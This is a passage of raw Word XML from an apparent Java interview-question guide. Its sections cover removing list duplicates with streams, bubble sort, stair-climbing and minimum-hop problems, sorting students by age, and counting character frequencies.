          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00273B42" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Remove duplicate element from list using java 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="376"/>
    </w:p>
    <w:p w14:paraId="14098810" w14:textId="32DDC3EA" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="00B507E5">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507E5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If I want to remove the duplicate values from ArrayList then how can we achieve it using java 8?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB57C0B" w14:textId="0F00AAC7"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79487391" w14:textId="684923A2"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istinc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llect</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Collector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516516D" w14:textId="7F7630ED" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="377" w:name="_Toc197867591"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="007928B7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Sort elements in array without inbuilt methods</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
    </w:p>
    <w:p w14:paraId="143E819E" w14:textId="2A38203D" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="003C562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C562E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If you have an array of integers then how will you sort it? Write actual logic without using inbuilt Methods?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFF4307" w14:textId="3897F115"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ual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CC4D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07FEB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2819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EF1C3D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F3B88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passes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9B75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arisons in each pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FBE20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A9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arr[j] and arr[j + 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF8366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794B47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81193B9"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55D0C54"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AED07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80A99E"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7EF4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8C87"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0074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4591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8AB35A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352CA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11FE708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301341"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45F9C7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03A5F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02583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AFDD50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2FC4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Sorted Array (Bubble Sort):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF4541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A76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07BF79F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B7E07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95AD" w14:textId="78457F4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109F9A1" w14:textId="77777777" w:rsidR="007928B7" w:rsidRPr="00CE4B95" w:rsidRDefault="007928B7" w:rsidP="007928B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EF6CC0" w14:textId="2AA05AAA" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="378" w:name="_Toc197867592"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="005A6DBB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="008A695E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ind distinct ways to reach the nth stair</w:t>
      </w:r>
      <w:bookmarkEnd w:id="378"/>
    </w:p>
    <w:p w14:paraId="102BC603" w14:textId="3C5E0C05" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="00684D1F">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684D1F" w:rsidRPr="00CE4B95">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airClimbe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58BCBC" w14:textId="67600A6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O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_000_000_007</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D6984" w14:textId="3446F7B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FD5B21D" w14:textId="4B31F36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77B33D99" w14:textId="790A97D1"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324F1596" w14:textId="12AFF65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EFBF0D6" w14:textId="51693F2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t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OD</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253174F" w14:textId="006DC6F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08B21C2D" w14:textId="077C295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emp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFA218" w14:textId="7629553B"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196D24F" w14:textId="64AB9E3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 </w:t>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420F0447" w14:textId="5360057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5240111" w14:textId="25BF4FC6"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 Test the function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F9148B" w14:textId="173E2640"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960D88" w14:textId="4186D629"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p>
    <w:p w14:paraId="23920FF9" w14:textId="6912C753"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p>
    <w:p w14:paraId="357B76C9" w14:textId="0C098D1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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88C0C1" w14:textId="3375BB7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9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05578DC0" w14:textId="02F79A32"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718E215" w14:textId="7551797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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066E5FA" w14:textId="6F936980" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="379" w:name="_Toc197867593"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00B211BD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimum hops </w:t>
      </w:r>
      <w:r w:rsidR="008640F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00B211BD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> staircase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
    </w:p>
    <w:p w14:paraId="26916364" w14:textId="6528FF95" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="0067596E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="0067596E" w:rsidRPr="00CE4B95">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nimumHo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052E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5A28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E0522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6BD78F6"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DD675C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71D35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C4E42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with the current number of hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072880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at the next hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA8EF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CCE0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6923C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the farthest we can reach from this step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E9AE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arth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0D880C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D23B3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current jump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836D21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27D5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e need to make another hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754925D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hops</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123EC97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rthest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC45C1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0C8643"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can reach or go beyond the last stair, break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188797E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A368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reak</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626BB8A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98D5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3184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7EE7B"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E4BA7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farthest point we can reach is beyond the last stair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2B355"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1 if it's impossible to reach the last stair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E36BB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B95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1360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30C2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50860B0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irs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416139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EA7AD1"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nimum hops requir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376898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86E5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t's impossible to reach the last stair."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321F09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0044"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95BC4" w14:textId="4698F43A"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64B26B5" w14:textId="77777777" w:rsidR="005E6BE8" w:rsidRPr="00CE4B95" w:rsidRDefault="005E6BE8" w:rsidP="005E6BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A0749F" w14:textId="408BE824" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="380" w:name="_Toc197867594"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00323041" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Sort Student data based on age using java 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="380"/>
    </w:p>
    <w:p w14:paraId="04A6ED1A" w14:textId="7149379D" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="008240D3">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3029" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>How will you sort the Student data based on their Age?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2C34F" w14:textId="3C58FEBA"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1D4F0D5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CBF7A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58D9E40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0DB5BD"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01DB4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146989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1C5902F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DD2BDD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38C9458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7D523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EC8D43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82049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F7010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F03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3320B7D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39B6E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62AA92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A883A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F7D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1CDCE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538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4C26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71B03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381476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D211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40A838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4EA13"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p>
    <w:p w14:paraId="4474A36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AEAC9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F2F4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6D47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43F1F99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3500718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6D0FAB1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D2499C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p>
    <w:p w14:paraId="502B64B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v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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2C38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2E03C"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F15CB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ing students based on age using stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F19D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61052B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p>
    <w:p w14:paraId="6B42BE2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A85BF7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10698A"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sorted student data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ADBD7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2C4A01C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A7AF6" w14:textId="02BA1FA6"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7F38555" w14:textId="77777777" w:rsidR="002C01D9" w:rsidRPr="00CE4B95" w:rsidRDefault="002C01D9" w:rsidP="002C01D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206B5E68" w14:textId="720A65E4" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="381" w:name="_Toc197867595"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00A51B3A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain logic </w:t>
      </w:r>
      <w:r w:rsidR="007968C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00A51B3A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> frequency of each character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
    </w:p>
    <w:p w14:paraId="0247C441" w14:textId="37743F68"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258137F7"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e through each character of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694CB2BA"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hrough the string one character at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E718C05"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 data structure to store the frequency count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25157EB9"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 if the character is already present in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B028C"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already in the map, increment its value by 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DB06B" w14:textId="5677E0C1"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not present, add it to the map with a value of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7435C093" w14:textId="1A11B2C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the frequency count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29C116"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Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB6B81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ing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0F7F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llo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6702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 frequency count in the map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073E23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68BB5E0E"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771430C0"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5C9F24A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604DA12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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F8491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2D190C5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34FA36C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529D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409D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2AF91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50A2BBB9"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E08964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7A79F51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33BD32C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C51BCA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66BF53FE"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624E4"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lready in the map, increment its frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2351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07A98C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43EEB3"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290BC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out the frequency of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B6182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C96CD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E61DB7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2DFA4B"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AA05A" w14:textId="73D989DE"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A56CC61"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Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBA3D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put(c, frequencyMap.getOrDefault(c, 0) + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8BEFB5"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55F51779"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36926D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2A741B1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4340FC5B"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2F1DFA37"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C14CA9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3A09382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Pr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BD2A10" w14:textId="77777777" w:rsidR="007968C3" w:rsidRPr="00CE4B95" w:rsidRDefault="007968C3" w:rsidP="007968C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1640B1FB" w14:textId="2AEDCE36" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="382" w:name="_Toc197867596"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="009112EA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count of unique character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="382"/>
    </w:p>
    <w:p w14:paraId="4AF89EC9" w14:textId="427B6EA3" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="004C6BE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4C6BE3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a code to print the count of unique characters from the String str = “Siddhant Patni”?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF06321" w14:textId="67F3661D"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5BD586F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29A6EC8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CBA446"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niqueCha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9C6A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F5E6F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AAF28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7F2688C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45AC1A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28C48295"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5D25038"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05C2FC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2BA1274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B32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and if character is not space, add to map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5483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6F7C4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CFEBE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DF1C2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6D98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1505F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unique characters (those with frequency 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F918A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unique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D7B20D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7A70DB4"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1EC57E12"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823D8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348008D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unt of unique character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Count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0DA6E"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D4B64F" w14:textId="440BF746"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9C2A36" w14:textId="77777777" w:rsidR="00940E24" w:rsidRPr="00CE4B95" w:rsidRDefault="00940E24" w:rsidP="00940E24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A62EE14" w14:textId="1E649E25" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="383" w:name="_Toc197867597"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00154622" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ThreeSum</w:t>
      </w:r>
      <w:bookmarkEnd w:id="383"/>
    </w:p>
    <w:p w14:paraId="451EB025" w14:textId="77777777" w:rsidR="0040341D" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="0040341D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
